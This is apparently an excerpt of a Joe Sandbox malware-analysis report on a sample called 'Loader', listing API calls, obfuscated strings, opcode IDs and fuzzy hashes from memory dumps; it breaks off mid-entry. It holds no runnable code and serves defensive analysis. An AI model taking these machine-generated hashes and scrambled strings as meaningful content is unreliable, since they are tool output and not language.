                                                                                                  • Instruction Fuzzy Hash: 77F16579A0C350DFD3248F55E88172BBBE1FBCA314F95482DEA859B351D7749802CB8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BC$DTS^$SDTB$WLTO$no$sNDW$xlc=
                                                                                                  • API String ID: 0-4261215005
                                                                                                  • Opcode ID: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                                  • Instruction ID: bc51c2f3923f1d1749b79aa7f72e467a3002caf565e53d3967ace05a6b2d116c
                                                                                                  • Opcode Fuzzy Hash: ccdc102990b4c15d3359c4579d9af196d84240e8b5d2da791b71984c89447364
                                                                                                  • Instruction Fuzzy Hash: F3D1F0B5A0C3908FD7309F24E8917ABB7F1EB96304F45482DE5C99B252DB748905CB8B
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429149
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: zPf?$~Pf?
                                                                                                  • API String ID: 237503144-2637493059
                                                                                                  • Opcode ID: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                                  • Instruction ID: 198dd5e36b7fe1fa964ce911b4fb16a36b701d1aa9f0cceef3b71a0ea0f726ca
                                                                                                  • Opcode Fuzzy Hash: 26d119dec0a38fc1d7c433e7bb48d8e841ee7a0981e4bddc7203521b33e83297
                                                                                                  • Instruction Fuzzy Hash: EB514675648305EFE3108F25AC81B6BB7A8FBC2704F50193DFA509B291DBB4D81ACB56
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AA0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00A813BD,00000002,00000000,?,?,?,00A813BD,?,00000000), ref: 00A81AC9
                                                                                                  • GetACP.KERNEL32(?,?,00A813BD,?,00000000), ref: 00A81ADE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
                                                                                                  • Instruction ID: f3a3c339105a04fc864aaafe16e605ec371b9e0530cff40077efbe93b58ca208
                                                                                                  • Opcode Fuzzy Hash: 47cbf9afaa400a01a0d178d794edea5d8a7b7e3aa207ba30393524f5181ce3ad
                                                                                                  • Instruction Fuzzy Hash: E7218672B02100AAEB3DEF64C901A97F3AEEF54FD4B968465E90AD7104E732DD42C350
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: +$JSQC$J_\e$iWDB$klSm$wJsU
                                                                                                  • API String ID: 0-48882314
                                                                                                  • Opcode ID: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                                  • Instruction ID: 6539de25e02be62e166c2d6d1fbf72afe4b3ae9106669352150e090de26398d0
                                                                                                  • Opcode Fuzzy Hash: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                                  • Instruction Fuzzy Hash: 1B72597090C3518FC725CF29C8406AFBBE1AF95314F188A6EE8E58B392D738D946C756
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00A62046
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A6206B
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A6207A
                                                                                                  • _strlen.LIBCMT ref: 00A620CD
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A621FD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 1490117831-0
                                                                                                  • Opcode ID: d4f9dd3fc68fb1d76d3c49847b05aa267e14e1d22a9df3488f6a8bd1e3995c2c
                                                                                                  • Instruction ID: f9dfcd79ecc4fb36fd59339d90cfed842ed2653c4f0da184a95053e8f49ab613
                                                                                                  • Opcode Fuzzy Hash: d4f9dd3fc68fb1d76d3c49847b05aa267e14e1d22a9df3488f6a8bd1e3995c2c
                                                                                                  • Instruction Fuzzy Hash: 8171D0B2D006189FCB10DFA8DC44BAEBBB5FF49320F184629E815B7391E7359945CBA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(00000000,?,00A7E58D), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00A78363), ref: 00A7C210
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00A8138F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00A813CD
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00A813E0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A81428
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A81443
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: aa92ca92b96489825536cdb5e59e60795c159193b23bc5de80c436e1842d7069
                                                                                                  • Instruction ID: 75313aa3c67ed755d0fa03882aff39850491ab4a549f03f296c0b854ce07372f
                                                                                                  • Opcode Fuzzy Hash: aa92ca92b96489825536cdb5e59e60795c159193b23bc5de80c436e1842d7069
                                                                                                  • Instruction Fuzzy Hash: 84516CB1A00219ABEB20EFA5DD45EBE77BCFF05740F544429F915EB190EB709A428B60
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: >j%h$C@$IG$YF$w
                                                                                                  • API String ID: 0-3977256543
                                                                                                  • Opcode ID: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                                  • Instruction ID: bddec1b54a39677e85b17c04ceb6ad18fd944dcb43d24b0713774ccf1a2472f2
                                                                                                  • Opcode Fuzzy Hash: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                                  • Instruction Fuzzy Hash: A302107260C3408BD704DF69C8516ABFBE2EFD6314F09882DE4D58B392E7389545CB9A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction ID: fd8cd92b472d63cb3222eb019da2d4f960f3aaaa87cb0d36c90cea5f3dd368b0
                                                                                                  • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction Fuzzy Hash: 4D023C71E012199BDF14CFA9CD80AAEB7B5FF98314F24C26AD519E7341D731A941CB90
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A820D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: fab0d0d7a906a1ae0d829601c3077758eed10a8c2442d6b1cafd20b3d5aa9ad6
                                                                                                  • Instruction ID: 6c5c6b2e54414649ba7908a5b7780143076792ce42a72b28e6608f1eb6dd454f
                                                                                                  • Opcode Fuzzy Hash: fab0d0d7a906a1ae0d829601c3077758eed10a8c2442d6b1cafd20b3d5aa9ad6
                                                                                                  • Instruction Fuzzy Hash: D271D1B1905168AEDF21FF649D8DBFAB7B9AF05300F1482DAE548A7251EB314E858F10
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00A6F8F5
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00A6F9C1
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A6F9DA
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00A6F9E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
                                                                                                  • Instruction ID: 52f410eaa349c78825ceb16ab6e5e30e719a5c3727eb7543ceed0797c9f5862b
                                                                                                  • Opcode Fuzzy Hash: 914e706b6d3369d806d90a80cd78db4af98297183f8037acd38a152d37cc6cef
                                                                                                  • Instruction Fuzzy Hash: 7D31F7B5D012199BDF21DFA4DD497CDBBB8AF08300F1041EAE40CAB250EB719A858F45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 3wA$Oslm$L4$L4
                                                                                                  • API String ID: 2994545307-2234767502
                                                                                                  • Opcode ID: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                                  • Instruction ID: 307d0b6bb99e80c2126adcaddeb59da55b998df86b0f55e95dd8da5ebd5bfe2f
                                                                                                  • Opcode Fuzzy Hash: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                                  • Instruction Fuzzy Hash: BFD147716083419FD724CF28C8817ABB7E2ABC6314F188A3DE4D983392D735D856CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 7$WT$gfff
                                                                                                  • API String ID: 0-3918836065
                                                                                                  • Opcode ID: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                                  • Instruction ID: b46a7ac6f51d3cab31650695944aba32df2089761ef6db5e6300506385caa733
                                                                                                  • Opcode Fuzzy Hash: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                                  • Instruction Fuzzy Hash: D8A13A73A106008FD318CA29CC517FBB7D3ABC5324F1AC63ED456CB2D9EA3898468785
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ju$tu$w~
                                                                                                  • API String ID: 0-2718015323
                                                                                                  • Opcode ID: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                                  • Instruction ID: 3c52c23171b1d345c2d49e998851337e4974a2c3d886fd1ac3d2f2ae50b48a00
                                                                                                  • Opcode Fuzzy Hash: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                                  • Instruction Fuzzy Hash: 6F41AA700093918BC724CF29C8606BBBBE0EF83364F04495DE5D28B291E3BD9945CB97
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: KJIH$xlc=$xlc=
                                                                                                  • API String ID: 0-3693430147
                                                                                                  • Opcode ID: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                                  • Instruction ID: 1df2b0cd354e5eb9382eacdd7d6201147e9d1f654fc09427a9397325319c904e
                                                                                                  • Opcode Fuzzy Hash: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                                  • Instruction Fuzzy Hash: 4441F53AB69724DBC7289F59ECC152AF7E1EB99710F84543ED982DB311C728DC01878A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @gB$kim}
                                                                                                  • API String ID: 0-565826954
                                                                                                  • Opcode ID: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                                  • Instruction ID: 9883a33267a4edeb7d73dc9f2210c431252dad24f6d1f8ca6899b908e8f0c5d9
                                                                                                  • Opcode Fuzzy Hash: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                                  • Instruction Fuzzy Hash: 1E225875E04265CFCB14CF68D8916AEBBB1EF49304F1980AED851AB352C739AD06CBD4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: p{-s$p{-s
                                                                                                  • API String ID: 2994545307-716220686
                                                                                                  • Opcode ID: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                                  • Instruction ID: f0c58c42614237375e365d72bc3c7a37cc96942c1005d0a9fe5c86925e2313ea
                                                                                                  • Opcode Fuzzy Hash: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                                  • Instruction Fuzzy Hash: 48810435240601AFC728CB29CD92672B7E2EB8530871C8D7FD156D76A6D73DE8229B08
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D]+\
                                                                                                  • API String ID: 0-1174097187
                                                                                                  • Opcode ID: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                                  • Instruction ID: 9251f9772932f48160a5ade6cb9760e2072f5487641182bc89e2b62d99dc5cf9
                                                                                                  • Opcode Fuzzy Hash: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                                  • Instruction Fuzzy Hash: C45224B9A18200ABD714DF14D84167BB7E1FBD6314F19892EE88197391D73CEC41CB9A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: z
                                                                                                  • API String ID: 2994545307-1657960367
                                                                                                  • Opcode ID: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                                  • Instruction ID: a41510cab639ff2c168ed1a461397d8e6c98ec91fc98b876038bb987118f98da
                                                                                                  • Opcode Fuzzy Hash: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                                  • Instruction Fuzzy Hash: 7FD12934A083409FD724CF2598907BBB7E2EBDA314F19592EE0D657291C738D847CB5A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 056w
                                                                                                  • API String ID: 2994545307-3031594284
                                                                                                  • Opcode ID: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                                  • Instruction ID: 1e524d56f986b60e63968127200a34d937c12baad4a8d406414dac60ed768612
                                                                                                  • Opcode Fuzzy Hash: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                                  • Instruction Fuzzy Hash: C0C17A72A083005BD3249E24CCC277BB7A2EBCA314F18A52ED59557391D6BCDC46C79A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \l
                                                                                                  • API String ID: 0-332606932
                                                                                                  • Opcode ID: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                                  • Instruction ID: 852c598ae3c60e65e129f9c36e5a4a5eb34ebc179e5d94f45104046a45fe5565
                                                                                                  • Opcode Fuzzy Hash: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                                  • Instruction Fuzzy Hash: E7B18D72A143209BD7249F24AC82677B3B1EFA1314F99852EECC557351E23CEC05C79A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: _
                                                                                                  • API String ID: 0-701932520
                                                                                                  • Opcode ID: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                                  • Instruction ID: 2874f46035bf117a80d7d2a23349d9cb71d49021efdfc033c4a59cdebb79e407
                                                                                                  • Opcode Fuzzy Hash: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                                  • Instruction Fuzzy Hash: 86B1F77560C3408BD7258F2898617FBBBF2ABDA314F28497ED4C687382D7389851875A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: /4-"
                                                                                                  • API String ID: 2994545307-255669811
                                                                                                  • Opcode ID: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                                  • Instruction ID: 5d47b2a4792fb15c73dd9788517ba42da93c73d11f813630f87d1316b5251ac7
                                                                                                  • Opcode Fuzzy Hash: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                                  • Instruction Fuzzy Hash: B8913835604311AFE720DF28C88066BB7E2EFD4750F19852DEA815B395DB39EC62C785
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c`^Z
                                                                                                  • API String ID: 0-4018570465
                                                                                                  • Opcode ID: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                                  • Instruction ID: 84572387e2f9d8e30e4a59fcb4903cfd6437d21f2140ce11b4878cf53556221a
                                                                                                  • Opcode Fuzzy Hash: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                                  • Instruction Fuzzy Hash: DA513576A0C3A18BC335CF3998903E7BBE2AF96704F58896EC4C99B205DA3845058786
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c`^Z
                                                                                                  • API String ID: 0-4018570465
                                                                                                  • Opcode ID: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                                  • Instruction ID: 62403507b67e3add205e3cb6eb23e8c84b81608dc76150191bd4437fa6a5d6a1
                                                                                                  • Opcode Fuzzy Hash: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                                  • Instruction Fuzzy Hash: 8241477061C3D18BD735CF3994903E7BBE1EB97700F68896DC0C987246DB3844068B96
                                                                                                  Strings
                                                                                                  Memory Dump Source
